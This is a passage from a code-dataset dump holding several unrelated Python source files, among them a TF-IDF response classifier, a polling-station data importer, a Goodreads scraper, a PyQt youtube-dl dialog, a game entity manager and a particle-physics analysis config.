\", \"\")\n tokens = nltk.word_tokenize(string)\n # str2 = uni_tag.tag(tokens)\n arr = nltk.pos_tag(tokens)\n str2=\"\"\n for(pos,tag) in arr:\n str2 = str2 + tag + \" \"\n newStr = str(str2).replace(\"[\", \"\").replace(\"]\", \"\").replace(\"'\", \"\").replace(\",\", \" \").strip()\n return newStr\n\ndef getData(fpInputYear,fpOutputYear):\n my_csv = pd.read_csv(fpInputYear)\n # filtered = my_csv.Score.str.match(\"I-\",na=False)\n # my_csv3 = my_csv2[my_csv2.Score != \"I-UR\"]\n columnResponse = my_csv.Response\n columnScore = my_csv.Score\n columnTestid = my_csv.Testid\n columnTopic = my_csv.Topic\n columnUserName=my_csv.Username\n columnPOS = my_csv.POS\n listSeparateTopic=my_csv.Topic.unique()\n dictTopicResponse = {}\n dictTopicString = {}\n\n strMF = 'I-MF'\n strMM = 'I-MM'\n strSE = 'I-SE'\n strNE = 'I-NE'\n dictScoreResponse = {strMF: [], strMM: [], strSE: [], strNE: []}\n print(listSeparateTopic)\n print(str(len(listSeparateTopic)))\n for item in listSeparateTopic:\n dictTopicResponse[str(item)]=[]\n\n print(str(len(columnResponse)),'\\t',str(len(columnScore)))\n i=-1\n listIndexInExcel=[]\n for item in columnResponse:\n # print(columnScore[i])\n i=i+1\n strScore = str(columnScore[i])\n strScore.strip()\n\n if not (strScore.startswith('I-') and strScore != 'I-UR'):\n continue\n listIndexInExcel.append(i)\n # columnResponse[i]=columnResponse[i].replace(\"

\", \"\").replace(\"

\", \"\")\n # strPOS=getPOSFromResponse(columnResponse[i])\n strResponse = str(columnResponse[i]).replace(\"

\", \"\").replace(\"

\", \"\").replace(\"
\", \"\")\n # print(strResponse)\n strTopic=str(columnTopic[i])\n\n # if strScore == strMF:\n # dictScoreResponse[strMF].append(strResponse)\n # # dictScoreResponse['I-MF'].append(' ')\n # # dictScoreResponse['I-MF'].append(strPOS)\n # elif strScore == strMM:\n # dictScoreResponse[strMM].append(strResponse)\n # # dictScoreResponse['I-MM'].append(' ')\n # # dictScoreResponse['I-MM'].append(strPOS)\n # elif strScore == strSE:\n # dictScoreResponse[strSE].append(strResponse)\n # # dictScoreResponse['I-SE'].append(' ')\n # # dictScoreResponse['I-SE'].append(strPOS)\n # elif strScore == strNE:\n # dictScoreResponse[strNE].append(strResponse)\n # # dictScoreResponse['I-NE'].append(' ')\n # # dictScoreResponse['I-NE'].append(strPOS)\n dictTopicResponse[strTopic].append(strResponse)\n\n\n strTotalIMF = ' '.join(dictScoreResponse[strMF])\n strTotalIMM = ' '.join(dictScoreResponse[strMM])\n strTotalISE = ' '.join(dictScoreResponse[strSE])\n strTotalINE = ' '.join(dictScoreResponse[strNE])\n for item in listSeparateTopic:\n strContentEachTopic = ' '.join(dictTopicResponse[item]).strip()\n if strContentEachTopic:\n dictTopicString[item]=strContentEachTopic\n\n numOfLabelTopic=0\n\n # print(strTotalIMF)\n # corpus = [str(strTotalIMF), str(strTotalIMM), str(strTotalISE), str(strTotalINE)]\n corpus=[]\n for item in dictTopicString:\n corpus.append(str(dictTopicString[item]))\n numOfLabelTopic=numOfLabelTopic+1\n\n for i in range(len(columnResponse)):\n strScore = str(columnScore[i])\n strScore.strip()\n if not (strScore.startswith('I-') and strScore != 'I-UR'):\n continue\n strResponse = str(columnResponse[i]).replace(\"

\", \"\").replace(\"

\", \"\").replace(\"
\", \"\")\n corpus.append(strResponse)\n\n vectorizer = TfidfVectorizer(ngram_range=(1, 4))\n X = vectorizer.fit_transform(corpus)\n arrFeatureNames = vectorizer.get_feature_names()\n print('names: ' + str(len(arrFeatureNames)) + ' ' + str(arrFeatureNames))\n dictTopicVectors = {}\n indexNumTopic=0\n columnTitleRow = \"no,username,testId,topic,\"\n for item in dictTopicString:\n dictTopicVectors[item] = X[indexNumTopic].todense()\n indexNumTopic=indexNumTopic+1\n columnTitleRow=''.join([columnTitleRow,item,\",\"])\n columnTitleRow = ''.join([columnTitleRow, \"\\n\"])\n csv = open(fpOutputYear, 'w')\n\n\n\n csv.write(columnTitleRow)\n\n print(str(len(corpus)))\n for i in range(numOfLabelTopic, len(corpus)):\n vectori = X[i].todense()\n rowList=\"\"\n for item in dictTopicString:\n distItem = cosine_similarity(vectori, dictTopicVectors[item])[0][0]\n rowList = ''.join([rowList, str(distItem), \",\"])\n\n indexCorpus=listIndexInExcel[i-numOfLabelTopic]\n expectedResult = columnTopic[indexCorpus]\n strUsername=columnUserName[indexCorpus]\n strTestId=str(columnTestid[indexCorpus])\n strTopic=str(columnTopic[indexCorpus])\n # strResponse = str(columnResponse[indexCorpus])\n # strPOS = str(columnPOS[indexCorpus])\n row = str(i - numOfLabelTopic+1)+\",\"+strUsername+\",\"+strTestId+\",\"+strTopic+\",\";\n row = ''.join([row,rowList, \"\\n\"])\n print(str(len(corpus))+\" index \"+str(indexCorpus))\n csv.write(row)\n # if(indexCorpus>50):\n # break\n print(listSeparateTopic)\n print(str(len(listSeparateTopic)))\n # indexItemLabel=0\n # for item in dictTopicString:\n # row = ''.join([row, str(lst[indexItemLabel]), \",\"])\n # indexItemLabel=indexItemLabel+1\n # + ',' + str(strTestId)+ ',' + str(strTopic) + ',' + str(distIMF) + ',' + str(distIMM) + ',' + str(distISE) + ',' + str(\n # distINE) + ',' + str(\n # maxDist) + ',' + str(classResult) + ',' + str(expectedResult) + '\\n'\n\n #\n # if distIMF == maxDist:\n # classResult = strMF\n # elif distIMM == maxDist:\n # classResult = strMM\n # elif distISE == maxDist:\n # classResult = strSE\n # else:\n # classResult = strNE\n\n # print(\n # str(i) + '\\t' + str(distIMF) + '\\t' + str(distIMM) + '\\t' + str(distISE) + '\\t' + str(distINE) + '\\t' + str(\n # maxDist) + '\\t' + str(classResult))\n # lst.append(distItem)\n\n # distIMM = cosine_similarity(vectori, dictTopicVectors[strMM])[0][0]\n # distISE = cosine_similarity(vectori, dictTopicVectors[strSE])[0][0]\n # distINE = cosine_similarity(vectori, dictTopicVectors[strNE])[0][0]\n\n # distIMF = cosine_similarity(vectori, vectori)[0][0]\n # distIMM = cosine_similarity(vectori, vectori)[0][0]\n # distISE = cosine_similarity(vectori, vectori)[0][0]\n # distINE = cosine_similarity(vectori, vectori)[0][0]\n\n # maxDist = max(lst)\n\n # classResult = strNE\n\ndef main():\n fpInputCombine = 'rpf_combine_2018_2019.csv'\n fpOutputCombine = 'vector_combine.csv'\n fpInputNewYear2019 = 'ratingPositionFilter_newData_2019.csv'\n fpOutputNewYear2019 = 'vector_topic_newData_2019.csv'\n getData(fpInputCombine,fpOutputCombine)\n # getData(fpInputNewYear2019, fpOutputNewYear2019)\n\nmain()\n","sub_path":"replicationPackages/code/spring2020/topicClassification/responseTopic.py","file_name":"responseTopic.py","file_ext":"py","file_size_in_byte":7444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"72969740","text":"import requests\r\nfrom you_tango import settings\r\n\r\n\r\ndef run_query(search_terms, size=10):\r\n webhose_api_key = settings.WEBHOSE_API_KEY\r\n root_url = settings.WEBHOSE_ROOT\r\n\r\n try:\r\n res = requests.get(root_url, {\r\n 'token': webhose_api_key,\r\n 'format': 'json',\r\n 'sort': 'relevancy',\r\n 'size': size,\r\n 'q': '{} language:chinese'.format(search_terms),\r\n })\r\n results = res.json()['posts']\r\n\r\n return [{'title': item['title'], 'link': item['url'], 'summary': item['text'][:200]} for item in results]\r\n except Exception as e:\r\n print('run_query error: {}'.format(e))\r\n return []\r\n\r\n\r\nif __name__ == '__main__':\r\n ss = run_query('oppo r11s')\r\n pass\r\n","sub_path":"rango/webhose.py","file_name":"webhose.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"646589971","text":"from data_importers.management.commands import BaseHalaroseCsvImporter\n\n\nclass Command(BaseHalaroseCsvImporter):\n council_id = \"MEN\"\n addresses_name = (\n \"2021-03-22T10:35:38.602035/Mendip polling_station_export-2021-03-20.csv\"\n )\n stations_name = (\n \"2021-03-22T10:35:38.602035/Mendip polling_station_export-2021-03-20.csv\"\n )\n elections = [\"2021-05-06\"]\n csv_delimiter = \",\"\n\n def address_record_to_dict(self, record):\n uprn = record.uprn.strip().lstrip(\"0\")\n\n if uprn in [\n \"250002342\", # 15 UNDERHILL CLOSE, STREET\n \"250002337\", # 191B HIGH STREET, STREET\n \"250045108\", # ORCHARD BYRE, POLSHAM, WELLS\n \"250070118\", # NEW MANOR FARM, POLSHAM, WELLS\n \"250011489\", # HONEYSUCKLE COTTAGE, HAVYATT, GLASTONBURY\n \"250044905\", # SUGAR LOAF BARN, KEWARD, WELLS\n \"250054828\", # THE HUNTERS, TADHILL, LEIGH UPON MENDIP, RADSTOCK\n \"250062887\", # THE ANNEXE WITHAM HALL FARM WITHAM HALL FARM TO BUNNS LANE, WITHAM FRIARY, FROME\n \"250030360\", # LILLEYS CIDER, ROEWOOD FARM ESTATE, BUNNS LANE, WEST WOODLANDS, FROME\n \"250060445\", # RIVERSIDE, BUNNS LANE, WEST WOODLANDS, FROME\n \"250072443\", # FROME MEDICAL CENTRE, ENOS WAY, FROME\n \"250040297\", # LITTLE ORCHARD, RUDGE ROAD, STANDERWICK, FROME\n \"250040299\", # MERRION, RUDGE ROAD, STANDERWICK, FROME\n \"250038119\", # MILL COTTAGE, IRON MILL LANE, OLDFORD, FROME\n \"250043259\", # 5 RED HOUSE HOLIDAY HOMES WHITE POST TO CHARLTON ROAD, STRATTON ON THE FOSSE, SHEPTON MALLET\n \"250040953\", # MOUNT PLEASANT, CHILCOMPTON, RADSTOCK\n ]:\n return None\n\n if record.housepostcode in [\n \"BA5 1RJ\",\n \"BA5 3QR\",\n \"BA6 9DH\",\n \"BA6 8DA\",\n \"BA6 8AP\",\n \"BA4 4BT\",\n \"BA4 4DP\",\n \"BA4 5HB\",\n \"BA3 4DN\",\n \"BA16 0BG\",\n \"BA16 0BD\",\n \"BA16 0JL\",\n \"BA16 0NU\",\n \"BA5 2FF\",\n \"BA11 2ED\",\n \"BA11 2AU\",\n \"BA11 2XG\",\n \"BA11 5EP\",\n \"BA11 2TQ\",\n \"BA11 4AJ\",\n \"BA11 4FJ\",\n \"BA11 5HA\",\n \"BA11 5BT\",\n \"BA3 5QE\",\n \"BA11 4NY\",\n \"BA16 0GJ\",\n \"BA6 8PE\",\n \"BA11 5FE\",\n \"BA5 3DS\",\n ]:\n return None\n\n return super().address_record_to_dict(record)\n","sub_path":"polling_stations/apps/data_importers/management/commands/import_mendip.py","file_name":"import_mendip.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"553273468","text":"import json\nimport pandas as pd\nimport spacy\nfrom tqdm import tqdm\nimport os\nimport pdb\n\n\n\n# filename_train = 'data/cleaned_posts.csv'\n\ndef get_freq(word, vocab):\n if word in vocab.keys():\n return vocab[word]\n return 0\ndef eval():\n\n if not os.path.exists('results/eval_raw/'):\n os.makedirs('results/eval_raw/')\n\n lst_file = os.listdir('data/test')\n cpt_file = 0\n\n f = open(\"data/raw/vocabulary.json\", \"r\", encoding='utf-8')\n vocab_all = json.load(f)\n\n f = open(\"data/raw/vocab0.json\", \"r\", encoding='utf-8')\n vocab_0 = json.load(f)\n\n f = open(\"data/raw/vocab1.json\", \"r\", encoding='utf-8')\n vocab_1 = json.load(f)\n\n f = open(\"data/raw/vocab2.json\", \"r\", encoding='utf-8')\n vocab_2 = json.load(f)\n\n df_eval = pd.DataFrame(columns=['text', 'label'])\n\n total_count = 0\n for key in vocab_all.keys():\n total_count += vocab_all[key]\n print('total word count:', total_count)\n # df_txt = pd.read_csv(filename_train)\n\n cpt = 0\n for filename_test in lst_file:\n desc = 'valid_'+str(cpt)\n cpt += 1\n df_txt = pd.read_csv(os.path.join('data/test/', filename_test), header=None)\n\n df_txt.columns = ['text', 'label']\n print('columns', df_txt.columns)\n\n for cpt_row in tqdm(range(len(df_txt)), desc=desc):\n\n tokens = tokenizer(df_txt['text'][cpt_row])\n label = df_txt['label'][cpt_row]\n word_count = 0\n freq = 0\n pred = [0, 0, 0]\n for token in tokens:\n token = token.text\n if token in vocab_all.keys():\n word_count = vocab_all[token]\n freq = 1 - word_count/total_count\n\n tmp = get_freq(token, vocab_0)\n pred[0] += tmp/word_count * freq\n\n tmp = get_freq(token, vocab_1)\n pred[1] += tmp/word_count * freq\n\n tmp = get_freq(token, vocab_2)\n pred[2] += tmp/word_count * freq\n\n\n prediction = pred.index(max(pred))\n\n # df_eval.loc[cpt_row] = [df_txt['text'][cpt_row], df_txt['label'][cpt_row]]\n df_eval.loc[cpt_row] = [df_txt['text'][cpt_row], prediction]\n\n df_eval.to_csv(os.path.join('results/eval_raw/', 'evaled_' + filename_test), index=False, header=False)\n\n\nif __name__ == '__main__':\n\n nlp = spacy.load('en_core_web_sm')\n tokenizer = nlp.Defaults.create_tokenizer(nlp)\n eval()","sub_path":"validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"273535015","text":"import requests\nfrom bs4 import BeautifulSoup\nimport books_server as bs\nimport books as b\n\n# b.add_column_to_table('books','description')\nbook_ids = bs.get_book_ids('description') #book_ids where there is no description\nprint(book_ids)\nfor book_reference_number in book_ids:\n page = requests.get('https://www.goodreads.com/book/show/' +str(book_reference_number[0]))\n#\n soup = BeautifulSoup(page.content, 'html.parser')\n try:\n book_description = (soup.find(id=\"descriptionContainer\").find(style=\"display:none\").get_text())\n print(book_description)\n b.updateTable(book_reference_number[0],'description', book_description)\n except(Exception, AttributeError) as error:\n print(error)","sub_path":"backend/Scrapers/BookDescriptionScraper.py","file_name":"BookDescriptionScraper.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"219097088","text":"import matplotlib\nimport matplotlib.pyplot as plt\nfrom random import randint\nfrom random import randint, shuffle\nfrom io import BytesIO\nimport base64\nimport requests\nimport json\n\nclass Q_type():\n multichoice = \"multichoice\"\n singlechoice = \"singlechoice\"\n photo = \"photo\"\n shortreply = \"shortreply\"\n\ndef find_x_angel_in_qualdrilateral():\n # setting matplotlib\n font = {'family': 'normal',\n 'weight': 'bold',\n 'size': 16}\n\n matplotlib.rc('font', **font)\n matplotlib.rcParams.update({'text.color': \"white\",\n 'axes.labelcolor': \"blue\"})\n # creating the plot\n x = [1, 0.75, 2.5, 3.5]\n y = [0.5, 1.25, 2, 1]\n fig = plt.figure(figsize=(8, 8))\n plt.axis('equal')\n plt.axis('off')\n\n # generating the question\n question = \"The diagram shows a quadrilateral. Find the value of X (NOT TO SCALE)\"\n a = []\n while not(200 < sum(a) < 340):\n a = [randint(30, 150), randint(30, 150), randint(30, 150)]\n\n answer = 360-sum(a)\n wrongs = set()\n while len(wrongs) < 4:\n a_wrong = randint(30, 150)\n if a_wrong != answer:\n wrongs.add(a_wrong)\n\n options = list(wrongs)+[answer]\n text = \"{q}---{a}\\n\\n\".format(q=question, a=answer)\n for i, o in enumerate(options):\n text += \"{i}) {o}\\n\".format(i=chr(i+65), o=o)\n\n # adding the texts\n plt.fill(x, y)\n plt.text(x[0], y[0]+0.1, a[0])\n plt.text(x[1]+0.1, y[1]-0.1, a[1])\n plt.text(x[2]-0.15, y[2]-0.2, a[2])\n plt.text(x[3]-0.3, y[3]+0.07, 'x')\n\n ax = fig.add_subplot(111)\n ax.text(0.5, 2, text, fontsize=13, color='black')\n\n # this is to convert the graph to the text format to send\n image = BytesIO()\n plt.savefig(image, format='png')\n image.seek(0)\n string_image1 = base64.encodebytes(image.getvalue()).decode()\n\n return {\"photo\": string_image1,\n \"q_type\": Q_type.singlechoice,\n \"hint\": [],\n \"solution\": []}\n\n","sub_path":"findX.py","file_name":"findX.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"354486241","text":"import pprint\nimport re\nimport subprocess\n\nfrom PyQt5.QtCore import Qt # , QAbstractTableModel, QVariant\n# from PyQt5.QtWidgets import QWidget\nfrom PyQt5.QtWidgets import QVBoxLayout, QHBoxLayout # QGridLayout\nfrom PyQt5.QtWidgets import QDialog, QDialogButtonBox\nfrom PyQt5.QtWidgets import QAbstractItemView\nfrom PyQt5.QtWidgets import QPushButton, QLineEdit # QLabel, QMessageBox\n\nimport listofformatswidget\n\n\nclass AddDlg(QDialog):\n \"\"\"AddDlg.\"\"\"\n def __init__(self, model, url, parent=None):\n super(AddDlg, self).__init__(parent)\n self.parent = parent\n self.model = model\n self.formats = []\n\n self.urlEdit = QLineEdit()\n self.btnGetInfo = QPushButton(\"&Info\")\n self.btnGetInfo.clicked.connect(self.btnGetInfoClick)\n\n urlBox = QHBoxLayout()\n urlBox.addWidget(self.urlEdit)\n urlBox.addWidget(self.btnGetInfo)\n\n self.listOfFormatsWidget = listofformatswidget.ListOfFormatsWidget()\n self.listOfFormatsWidget.setSelectionMode(QAbstractItemView.ExtendedSelection)\n self.listOfFormatsWidget.itemClicked.connect(self.listOfFormatsWidget.clicked)\n self.listOfFormatsWidget.currentItemChanged.connect(self.listOfFormatsWidget.itemChanged)\n\n addButton = QPushButton(\"&Add\")\n addButton.setDefault(True)\n\n buttonBox = QDialogButtonBox(QDialogButtonBox.Cancel)\n buttonBox.addButton(addButton, QDialogButtonBox.AcceptRole)\n buttonBox.accepted.connect(self.addButtonClick)\n buttonBox.rejected.connect(self.reject)\n\n grid = QVBoxLayout()\n grid.addLayout(urlBox)\n grid.addWidget(self.listOfFormatsWidget)\n grid.addWidget(buttonBox)\n\n self.setLayout(grid)\n self.setWindowTitle(\"Add movie\")\n self.setWindowModality(Qt.ApplicationModal)\n self.urlEdit.setText(url)\n self.resize(600, 400)\n # self.exec_()\n\n def addButtonClick(self):\n # TODO(me): add getting of real props instead of 'Кухня 88'\n audio = ''\n video = ''\n print(self.urlEdit.text())\n rows = self.listOfFormatsWidget.selectionModel().selectedRows()\n for row in rows:\n # print(row.data(), \"\\n\")\n matchLine = re.match(r'^(\\d+)\\s', row.data(), re.M | re.I)\n if matchLine:\n # print(\" @@@>>> \", matchLine.group(1))\n matchVideo = re.match(r'^(\\d+)\\s.*DASH video', row.data(), re.M | re.I)\n if matchVideo:\n print(\" @@@ Video >>> \", matchVideo.group(1))\n video = matchLine.group(1)\n matchAudio = re.match(r'^(\\d+)\\s.*DASH audio', row.data(), re.M | re.I)\n if matchAudio:\n print(\" @@@ Audio >>> \", matchAudio.group(1))\n audio = matchLine.group(1)\n\n pp = pprint.PrettyPrinter(indent=4, width=1024)\n # pp.pprint(self.formats)\n \n for f in self.formats:\n print(f)\n\n self.model.addrow(['Кухня 88', video, audio, '0%', self.urlEdit.text(), self.formats, ])\n self.model.layoutChanged.emit()\n\n self.accept()\n\n def btnGetInfoClick(self):\n # Load movie's info\n # https://www.youtube.com/watch?v=G6bSu02Fmxo - Кухня\n # https://www.youtube.com/watch?v=1IEfCoGnTow - 100 Years of Flight Attendant Uniforms\n # default format: -o '%(title)s-%(id)s.%(ext)s'\n # youtube-dl -j --flat-playlist\n\n videoUrl = self.urlEdit.text()\n process_output = subprocess.check_output([\"youtube-dl\", \"-F\", videoUrl], universal_newlines=True)\n # print(process_output + \"\\n\\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\\n\")\n lines = process_output.split(\"\\n\")\n for line in lines:\n matchLine = re.match(r'^(\\d+)\\s', line, re.M | re.I)\n if matchLine:\n # print (matchLine.group(1), \" -> \", line)\n self.listOfFormatsWidget.addItem(matchLine.group(1) + \" -> \" + line)\n self.formats.append(line)\n\n fw = 2 * self.listOfFormatsWidget.frameWidth()\n self.listOfFormatsWidget.setFixedSize(self.listOfFormatsWidget.sizeHintForColumn(0) + fw,\n self.listOfFormatsWidget.sizeHintForRow(0) * self.listOfFormatsWidget.count() + fw)\n # QMessageBox.information(self, \"btnGetInfoClick\", \"You clicked: \")\n","sub_path":"AddDlg.py","file_name":"AddDlg.py","file_ext":"py","file_size_in_byte":4422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"232004226","text":"\"\"\"Module for entity related stuff\"\"\"\n#Python imports\nfrom time import time\n\n#Game imports\nfrom vectors import Vector\nfrom utilities import class_name\nfrom graphics import COLOR_WHITE\nfrom utilities import class_name, encode_word, decode_word, encode_long, decode_long, encode_string, decode_string, get_logger\n\nclass EntityManager(object):\n \"\"\"Stores all entities and controls the pool, also propagates the update and draw functions\"\"\"\n def __init__(self, world):\n self.__log = get_logger(\"entity_manager\")\n self.__world = world\n\n def start(self):\n \"\"\"Initializes the entity storages and uids\"\"\"\n self.__entities = {} #All entities existing, non deleted and deleted, categorized by their uid\n self.__reusable = {} #Entities that are with Delete flag, each class name has a list of reusable entities, same as __entities organization\n self.__uid = 0 #Global uid for entities\n self.__entity_classes = {}\n for entity_cls in ENTITY_CLASSES:\n name = class_name(entity_cls)\n self.__entity_classes[name] = entity_cls\n\n def close(self):\n \"\"\"Called when the entity manager is closed\"\"\"\n self.__entities = None\n self.__reusable = None\n self.__uid = None\n self.__entity_classes = None\n\n def __get_uid(self):\n \"\"\"Generates a unique id for a entity\"\"\"\n uid = self.__uid\n self.__uid = uid + 1\n return uid\n\n def use_entity(self, entity_class, force_uid = None):\n \"\"\"Creates or reused a entity of same class\"\"\"\n name = class_name(entity_class)\n entity = None\n reused = False #True if the entity is reused\n if name in self.__reusable.keys():\n reusable = self.__reusable[name] #Get all entities that are reusable with the same classname\n if len(reusable) != 0: #Get an reusable entity from the list\n entity = reusable.pop()\n reused = True\n else: #If there is no an list for the classname, make one\n self.__reusable[name] = []\n\n if entity == None: #There was no luck getting a reusable entity, lets create a new one\n uid = self.__get_uid() if force_uid == None else force_uid\n entity = entity_class(uid, self.__world)\n\n if reused:\n text = \"Reused\"\n else:\n text = \"Created\"\n self.__log.debug(\"%s entity '%s' in '%s' with uid '%i'\" % (text, name, hex(id(entity)), entity.get_uid()))\n\n self.__entities[entity.get_uid()] = entity\n\n return entity, reused\n\n def deserialize_entity(self, uid, data):\n \"\"\"deserializes a entity\"\"\"\n index = 0\n name, index = decode_string(data, index)\n data = data[index:] #Remove the UID and class name from data\n if uid in self.__entities.keys(): #UID exists already\n entity = self.__entities[uid]\n else:\n cls = self.__entity_classes[name]\n entity = self.use_entity(cls, uid)[0]\n\n if uid != entity.get_uid():\n raise ValueError(\"Entity %s has uid %s but serialized data was for %s\" % (entity, entity.get_uid(), uid))\n if name != class_name(entity):\n raise ValueError(\"Entity %s has cls %s but serialized data was for %s\" % (entity, class_name(entity), name))\n\n def serialize_entity(self, uid):\n \"\"\"serializes a entity\"\"\"\n entity = self.__entities[uid]\n #Start with the class name\n data = encode_string(class_name(entity))\n #Sum the entity serialization data\n data = data + entity.serialize()\n return data\n\n def update(self):\n \"\"\"Calls update for all active entities and moves to self.__reusable if they are with delete flag\"\"\"\n for entity in self.__entities.values():\n name = class_name(entity)\n if entity not in self.__reusable[name]: #Check if is not in reusable dict\n if entity.delete: #Deleted and not in reusable dict? append it\n self.__reusable[name].append(entity)\n else:\n entity.update()\n\n def draw(self):\n \"\"\"Calls draw for all active entities\"\"\"\n for entity in self.__entities.values():\n if not entity.delete: #Render if is not deleted\n entity.draw()\n\n def get_entities(self):\n \"\"\"Get entity list\"\"\"\n return self.__entities\n\n def get_entity(self, uid):\n \"\"\"Returns the asociated entity instance by uid\"\"\"\n return self.__entities[uid]\n\nclass Entity(object): # pylint: disable=R0902\n \"\"\"The entity class which all entities in the world are subclassed, the only authorized to say \"I'm your father\" quote to everybody\"\"\"\n def __init__(self, uid, world):\n self.__uid = uid\n self.__world = world\n self.__load()\n self.init()\n\n def __load(self):\n \"\"\"Loads data when entity is created, doesn't run when entity is reused, ideal for image loading for example\"\"\"\n pass\n\n def init(self):\n \"\"\"Values that are used for managing the entity in update(), also they are reset for reusing the object instance\"\"\"\n self.health = 100 #Health of entity\n self.max_health = 100 #Maximum health level\n self.nodamage = False #Makes the entity indestructible (sets the health to maximum every update and ignores health < 0)\n self.team = None #Team of the entity belongs\n self.delete = False #Deletion flag, when its True, means that it can be reused, also with this true, update and draw is not called\n\n #Private or immutable values,\n self.__pos = Vector(0, 0) #The actual position of the unit\n self.__prev_pos = Vector(0, 0) #The previous position before a net update, used for interpolation\n self.__heading = 0 #Heading of the unit\n self.__prev_heading = 0 #Previous heading of unit, used for interpolation\n\n #Values that are not send during serialization\n self.__image = None #Contains Surface of actual frame\n self.__net_contact = time() #The last network update, used for interpolation\n\n def get_uid(self):\n \"\"\"Returns the entity's unique id\"\"\"\n return self.__uid\n\n @property\n def pos(self):\n \"\"\"Get the position\"\"\"\n return self.__pos\n\n @pos.setter\n def pos(self, pos, update_prev = True):\n \"\"\"Set the position\"\"\"\n if update_prev:\n self.__prev_pos = pos\n self.__pos = Vector(pos)\n\n @property\n def heading(self):\n \"\"\"Get the heading\"\"\"\n return self.__heading\n\n @heading.setter\n def heading(self, heading, update_prev = True):\n \"\"\"Set the heading\"\"\"\n if update_prev:\n self.__prev_heading = heading\n self.__heading = heading\n\n def update(self):\n \"\"\"Called when the entity is updated\"\"\"\n self.health_update()\n\n def health_update(self):\n \"\"\"Checks health\"\"\"\n if self.nodamage:\n self.health = self.max_health\n elif (self.health <= 0):\n self.delete = True\n\n def draw(self):\n \"\"\"Called when the entity needs to be drawed\"\"\"\n graphics = self.__world.graphics\n graphics.draw_circle(COLOR_WHITE, self.__pos.round(), 5)\n\n def serialize(self):\n \"\"\"Called when needs to serialize this entity\"\"\"\n #Add the positions and heading\n x, y = self.pos.round()\n data = encode_word(x)\n data = data + encode_word(y)\n data = data + encode_word(self.heading)\n return data\n\n def deserialize(self, data):\n \"\"\"Called when needs to deserialize information on this entity\"\"\"\n #Get the x y coordinates and heading in first 3 words bytes\n index = 0\n self.x = decode_word(data[index:index+2])\n index = index + 2\n self.y = decode_word(data[index:index+2])\n index = index + 2\n self.heading = decode_word(data[index:index+2])\n\n def net_update(self):\n \"\"\"Update the network contact time\"\"\"\n self.__net_contact = time()\n\nclass Unit(Entity):\n \"\"\"A class for generic tank\"\"\"\n def __load(self):\n pass\n\nclass Tank(Unit):\n \"\"\"A class for generic tank\"\"\"\n def __load(self):\n pass\n\nENTITY_CLASSES = (\n Entity,\n Unit,\n Tank,\n)\n\nif __name__ == '__main__': from main import init_main; init_main()\n","sub_path":"src/entities.py","file_name":"entities.py","file_ext":"py","file_size_in_byte":8493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"37939944","text":"from rest_framework import serializers\n\nfrom .models import Author\n\n\nclass AuthorSerializer(serializers.ModelSerializer):\n picture = serializers.SerializerMethodField(source=\"picture\", method_name=\"get_picture\")\n class Meta:\n model = Author\n fields = [\"id\", \"name\", \"picture\"]\n read_only_fields = [\"id\", \"picture\"]\n\n def get_picture(self, obj):\n if not obj.picture:\n return None\n\n return self.context[\"request\"].build_absolute_uri(obj.picture.url)\n\n\nclass PictureAuthorSerializer(serializers.ModelSerializer):\n class Meta:\n model = Author\n fields = [\"picture\"]\n","sub_path":"app/author/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"453220338","text":"from JChaves.Tools.CMSTools import *\nimport JChaves.Tools.Samples as Samples\nimport os,glob,sys\nimport FWCore.ParameterSet.Config as cms\n\nttbar = 'ttbar' in sys.argv\ndyjets = 'dyjets' in sys.argv\nsubmit = 'submit' in sys.argv\n\nprocess = cms.Process(\"ANA\")\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\nprocess.MessageLogger.cerr.FwkReport.reportEvery = 1000\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )\n\nprocess.source = cms.Source(\"PoolSource\",\n fileNames=cms.untracked.vstring('root://cmsxrootd-site.fnal.gov//store/mc/Summer12/WRToNuLeptonToLLJJ_MW-3500_MNu-1750_TuneZ2star_8TeV-pythia6-tauola/GEN-SIM/START50_V13-v2/0000/04317A88-1FA2-E111-8D7A-485B39897242.root'),\n )\n# This only works interactively\nmass = '_'\nif not ttbar and not dyjets:\n for m in sys.argv:\n if '00' in m:\n mass = '_'+m\ndset = ''\nfor s in Samples.signal_samples:\n if mass in s.name:\n dset = s.dataset\n \n#process.source.fileNames = file_list(dset+'step4_PAT*.root',True)\n#process.source.fileNames = file_list('/DYJetsToLL_M-50_13TeV-madgraph-pythia8/Phys14DR-PU20bx25_PHYS14_25_V1-v1/MINIAODSIM',False)\n#process.source.fileNames = file_list('/eos/uscms/store/user/jchaves/Nstep_EE_2000_reco/EXO-Phys14DR-00009_*.root',True)\nprocess.source.fileNames = file_list('/eos/uscms/store/user/jchaves/Nstep_MUMU_2000_reco/EXO-Phys14DR-00009_*.root',True)\n#process.source.fileNames = file_list('/eos/uscms/store/user/jchaves/Nstep_MUMU_3000_reco/EXO-Phys14DR-00009_*.root',True)\n#process.source.fileNames = file_list('/eos/uscms/store/user/jchaves/Nstep_MUMU_4000_reco/EXO-Phys14DR-00009_*.root',True)\n#process.source.fileNames = file_list('/eos/uscms/store/user/jchaves/Nstep_MUMU_5000_reco/EXO-Phys14DR-00009_*.root',True)\n#process.source.fileNames = file_list('/eos/uscms/store/user/jchaves/Nstep_MUMU_6000_reco/EXO-Phys14DR-00009_*.root',True)\noutfile = 